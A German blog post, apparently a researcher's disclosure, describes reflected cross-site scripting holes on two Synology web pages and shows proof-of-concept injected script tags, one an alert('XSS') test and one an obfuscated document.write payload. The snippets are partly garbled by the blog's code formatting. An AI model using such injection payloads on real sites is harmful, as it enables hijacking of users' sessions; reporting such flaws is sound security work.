Über Synology

Synology , der wohl beste Hersteller für NAS (Network Attached Storage) Systeme und Geräte ist seit Jahren mein Favorit in Sachen netzgebundener Speicher und deren Verwaltung. So kann ich jedem die DS214+  die empfehlen, die für den Hausbereich völlig ausreichend ist.

Die Schwachstellen

Die Schwachstellen entdeckte ich auf den Seiten bug.synology.com  und myds.synology.com .

Auf der Bug Tracker Seite wurde ein an den GET-Request gehängter Code ungefiltert in ein verstecktes Input Feld übernommen.

1
2
3
4
5

[...]
<input type="<span class=" />hidden" name="1"><script>// <![CDATA[
alert('XSS')
// ]]></script>" value="1">
[...]

Auf der Management Seite war der POST Parameter type verwundbar.
Manipulierter Inhalt wurde direkt in einen Javascript Code inkludiert.

1
2
3
4
5
6
7
8

[...]<script type="<span class=">// <![CDATA[
text</span>/javascript">
function redirect() {
if ('product' == "
// ]]></script><script>// <![CDATA[
document.write(String.fromCharCode([...]))
// ]]></script>") { window.location = "register_form.php?lang=" + "deu"; } else { window.location = "register_enews_form.php?lang=" + "deu"; } }
[...]